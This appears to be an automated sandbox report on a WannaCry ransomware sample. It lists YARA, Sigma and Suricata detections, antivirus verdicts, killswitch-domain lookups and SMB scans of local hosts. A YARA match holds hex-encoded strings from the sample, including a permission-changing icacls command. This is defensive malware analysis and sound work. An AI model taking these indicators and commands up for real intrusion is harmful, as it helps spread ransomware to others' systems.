17.2.mssecsvc.exe.24fd8e8.6.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x3655c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x36584:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Click to see the 114 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\WINDOWS\mssecsvc.exe, ParentImage: C:\Windows\mssecsvc.exe, ParentProcessId: 4432, ParentProcessName: mssecsvc.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p, ProcessId: 744, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: winlogon.exe, CommandLine: winlogon.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\winlogon.exe, NewProcessName: C:\Windows\System32\winlogon.exe, OriginalFileName: C:\Windows\System32\winlogon.exe, ParentCommandLine: C:\WINDOWS\mssecsvc.exe, ParentImage: C:\Windows\mssecsvc.exe, ParentProcessId: 4432, ParentProcessName: mssecsvc.exe, ProcessCommandLine: winlogon.exe, ProcessId: 556, ProcessName: winlogon.exe

Suricata Signatures

ET MALWARE Known Hostile Domain ilo.brenz .pl Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:57:25.556934+0100	2012730	1	A Network Trojan was detected	192.168.2.8	64320	1.1.1.1	53	UDP
2025-01-15T16:58:17.011779+0100	2012730	1	A Network Trojan was detected	192.168.2.8	61724	1.1.1.1	53	UDP
2025-01-15T16:59:08.402519+0100	2012730	1	A Network Trojan was detected	192.168.2.8	63409	1.1.1.1	53	UDP

ET MALWARE Known Sinkhole Response Kryptos Logic

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:57:16.080806+0100	2031515	3	Misc activity	104.16.166.228	80	192.168.2.8	49704	TCP
2025-01-15T16:57:29.210203+0100	2031515	3	Misc activity	104.16.167.228	80	192.168.2.8	49710	TCP
2025-01-15T16:57:29.298854+0100	2031515	3	Misc activity	104.16.167.228	80	192.168.2.8	49711	TCP

ET MALWARE Possible WannaCry DNS Lookup 1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:57:15.577268+0100	2024291	1	A Network Trojan was detected	192.168.2.8	63761	1.1.1.1	53	UDP
2025-01-15T16:57:28.691144+0100	2024291	1	A Network Trojan was detected	192.168.2.8	64182	1.1.1.1	53	UDP

ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:57:16.080006+0100	2024298	1	A Network Trojan was detected	192.168.2.8	49704	104.16.166.228	80	TCP
2025-01-15T16:57:29.208532+0100	2024298	1	A Network Trojan was detected	192.168.2.8	49710	104.16.167.228	80	TCP
2025-01-15T16:57:29.292333+0100	2024298	1	A Network Trojan was detected	192.168.2.8	49711	104.16.167.228	80	TCP

ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:57:16.080006+0100	2024299	1	A Network Trojan was detected	192.168.2.8	49704	104.16.166.228	80	TCP
2025-01-15T16:57:29.208532+0100	2024299	1	A Network Trojan was detected	192.168.2.8	49710	104.16.167.228	80	TCP
2025-01-15T16:57:29.292333+0100	2024299	1	A Network Trojan was detected	192.168.2.8	49711	104.16.167.228	80	TCP

ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:57:16.080006+0100	2024301	1	A Network Trojan was detected	192.168.2.8	49704	104.16.166.228	80	TCP
2025-01-15T16:57:29.208532+0100	2024301	1	A Network Trojan was detected	192.168.2.8	49710	104.16.167.228	80	TCP
2025-01-15T16:57:29.292333+0100	2024301	1	A Network Trojan was detected	192.168.2.8	49711	104.16.167.228	80	TCP

ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:57:16.080006+0100	2024302	1	A Network Trojan was detected	192.168.2.8	49704	104.16.166.228	80	TCP
2025-01-15T16:57:29.208532+0100	2024302	1	A Network Trojan was detected	192.168.2.8	49710	104.16.167.228	80	TCP
2025-01-15T16:57:29.292333+0100	2024302	1	A Network Trojan was detected	192.168.2.8	49711	104.16.167.228	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:57:16.080006+0100	2803304	3	Unknown Traffic	192.168.2.8	49704	104.16.166.228	80	TCP
2025-01-15T16:57:29.208532+0100	2803304	3	Unknown Traffic	192.168.2.8	49710	104.16.167.228	80	TCP
2025-01-15T16:57:29.292333+0100	2803304	3	Unknown Traffic	192.168.2.8	49711	104.16.167.228	80	TCP

ETPRO MALWARE Possible Virut DGA NXDOMAIN Responses (com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:58:25.678068+0100	2811577	1	A Network Trojan was detected	1.1.1.1	53	192.168.2.8	53292	UDP
2025-01-15T16:58:48.953187+0100	2811577	1	A Network Trojan was detected	1.1.1.1	53	192.168.2.8	61145	UDP
2025-01-15T16:59:06.237534+0100	2811577	1	A Network Trojan was detected	1.1.1.1	53	192.168.2.8	61597	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: GeW4GzT8G8.dll

Avira: detected

Antivirus detection for dropped file

Source: C:\Windows\tasksche.exe	Avira: detection malicious, Label: TR/AD.WannaCry.sewvt
Source: C:\Windows\mssecsvc.exe	Avira: detection malicious, Label: W32/Virut.Gen

Multi AV Scanner detection for dropped file

Source: C:\Windows\mssecsvc.exe	ReversingLabs: Detection: 95%
Source: C:\Windows\tasksche.exe	ReversingLabs: Detection: 100%

Multi AV Scanner detection for submitted file

Source: GeW4GzT8G8.dll	ReversingLabs: Detection: 94%
Source: GeW4GzT8G8.dll	Virustotal: Detection: 75%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Windows\tasksche.exe	Joe Sandbox ML: detected
Source: C:\Windows\mssecsvc.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: GeW4GzT8G8.dll

Joe Sandbox ML: detected

Exploits

Connects to many different private IPs (likely to spread or exploit)

Source: global traffic	TCP traffic: 192.168.2.39:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.38:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.42:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.41:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.44:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.43:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.46:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.45:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.48:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.47:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.40:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.28:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.27:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.29:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.31:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.30:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.33:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.32:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.35:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.34:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.37:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.36:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.17:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.16:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.19:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.18:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.20:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.22:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.21:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.24:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.23:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.26:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.25:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.97:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.96:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.11:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.99:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.10:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.98:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.13:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.12:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.15:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.14:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.91:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.90:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.93:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.92:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.95:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.94:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.2:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.1:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.8:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.7:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.9:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.4:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.3:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.6:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.5:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.86:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.104:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.85:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.105:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.88:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.102:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.87:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.103:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.108:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.89:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.109:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.106:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.107:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.80:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.82:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.100:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.81:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.101:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.84:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.83:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.75:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.74:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.77:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.113:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.76:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.114:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.79:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.78:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.71:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.111:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.70:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.112:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.73:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.72:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.110:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.64:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.63:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.66:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.65:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.68:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.67:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.69:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.60:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.62:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.61:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.49:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.53:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.52:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.55:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.54:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.57:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.56:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.59:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.58:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.51:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.50:445	Jump to behavior

Connects to many different private IPs via SMB (likely to spread or exploit)

Source: global traffic	TCP traffic: 192.168.2.39:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.38:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.42:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.41:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.44:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.43:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.46:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.45:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.48:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.47:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.40:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.28:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.27:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.29:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.31:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.30:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.33:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.32:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.35:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.34:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.37:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.36:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.17:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.16:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.19:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.18:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.20:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.22:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.21:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.24:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.23:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.26:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.25:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.97:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.96:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.11:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.99:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.10:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.98:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.13:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.12:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.15:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.14:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.91:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.90:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.93:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.92:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.95:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.94:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.2:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.1:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.8:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.7:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.9:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.4:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.3:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.6:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.5:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.86:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.104:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.85:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.105:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.88:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.102:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.87:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.103:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.108:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.89:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.109:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.106:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.107:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.80:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.82:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.100:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.81:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.101:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.84:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.83:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.75:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.74:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.77:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.113:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.76:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.114:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.79:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.78:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.71:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.111:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.70:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.112:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.73:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.72:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.110:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.64:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.63:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.66:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.65:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.68:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.67:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.69:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.60:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.62:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.61:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.49:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.53:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.52:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.55:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.54:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.57:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.56:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.59:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.58:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.51:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.50:445	Jump to behavior

Source: GeW4GzT8G8.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL

Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Diagnostics.pdb source: svchost.exe, 00000018.00000002.2737701303.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1534945793.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000018.00000000.1534844506.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2736501628.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbx source: svchost.exe, 00000018.00000002.2737701303.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1534945793.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000018.00000000.1534844506.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2736501628.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ~1.PDB @7_9)ux source: svchost.exe, 00000018.00000000.1534844506.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2736501628.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000018.00000000.1535058474.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2738834921.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000018.00000000.1535058474.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2738834921.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error3)y source: svchost.exe, 00000018.00000002.2737701303.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1534945793.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000018.00000002.2737701303.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1534945793.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000018.00000000.1535058474.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2738834921.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000018.00000002.2737701303.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1534945793.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000018.00000000.1535058474.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2738834921.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000018.00000000.1534844506.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2736501628.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb04 source: svchost.exe, 00000018.00000000.1535058474.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2738834921.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: mp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000018.00000002.2737701303.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1534945793.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorV)y source: svchost.exe, 00000018.00000002.2737701303.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1534945793.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000018.00000000.1534844506.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2736501628.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\symsrv.dllp.pdb source: svchost.exe, 00000018.00000000.1535058474.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2738834921.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2012730 - Severity 1 - ET MALWARE Known Hostile Domain ilo.brenz .pl Lookup : 192.168.2.8:64320 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2024298 - Severity 1 - ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 : 192.168.2.8:49711 -> 104.16.167.228:80
Source: Network traffic	Suricata IDS: 2024299 - Severity 1 - ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 2 : 192.168.2.8:49711 -> 104.16.167.228:80
